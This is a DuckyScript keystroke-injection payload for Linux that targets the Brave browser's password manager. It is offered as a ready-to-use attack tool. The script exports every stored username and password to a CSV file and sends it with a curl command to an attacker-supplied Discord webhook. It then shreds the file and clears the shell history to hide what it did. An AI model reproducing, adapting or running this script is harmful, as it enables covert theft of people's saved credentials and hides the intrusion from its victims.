1
REM TITLE: Brave_Breacher
2
REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
3
REM TARGET OS: Linux (tested on Pop!_OS) | Brave Browser Flatpak Version: 1.77.101
4
REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload exports a copy of all usernames and passwords stored in the Brave Browser password manager. It then exfiltrates the file via discord webhook and obfuscates its' activity by closing all opened windows, clearing the terminal history, and shredding the exported 'Brave Passwords.csv' file once exfiltrated. To be operable, place Discord webhook in #WEBHOOK_URL constant on line 6.
5

6
DEFINE #WEBHOOK_URL https://discord.com/api/webhooks/PLACE/DISCORD/WEBHOOK
7

8
REM Begin attack:
9
ATTACKMODE HID
10
DELAY 1000
11

12
REM Launching Brave Browser:
13
INJECT_MOD
14
GUI
15
DELAY 200
16
STRING brav
17
DELAY 100
18
ENTER
19
DELAY 600
20

21
REM Accessing password manager:
22
STRINGLN brave://password-manager/passwords
23
DELAY 300
24

25
REM Password manager is now open.
26
REM Navigating to password manager settings menu:
27
REPEAT 2 TAB
28
DELAY 50
29
DOWN
30
DELAY 50
31
ENTER
32
DELAY 50
33

34
REM Downloading "Brave Passwords.csv" locally to home directory:
35
REPEAT 4 TAB
36
ENTER
37
DELAY 125
38
ENTER
39
DELAY 400
40

41
REM Closing Brave Browser:
42
CTRL w
43

44
REM Opening terminal window:
45
DELAY 200
46
CTRL ALT t
47
DELAY 300
48

49
REM Exfiltrating "Brave Passowrds.csv" via Discord webhook:
50
STRINGLN curl -X POST -H "Content-Type: multipart/form-data" \
51
STRINGLN -F "file=@/home/$USER/Brave Passwords.csv" \
52
STRINGLN -F "content=$ Loot Incoming $" \
53
STRINGLN #WEBHOOK_URL
54
DELAY 100
55

56
REM Shredding 'Brave Passwords.csv', clearing terminal session history, and exiting terminal to obfuscate activity:
57
STRINGLN shred -fuz 'Brave Passwords.csv'
58
DELAY 25
59
STRINGLN history -c
60
DELAY 25
61
STRINGLN exit
62

63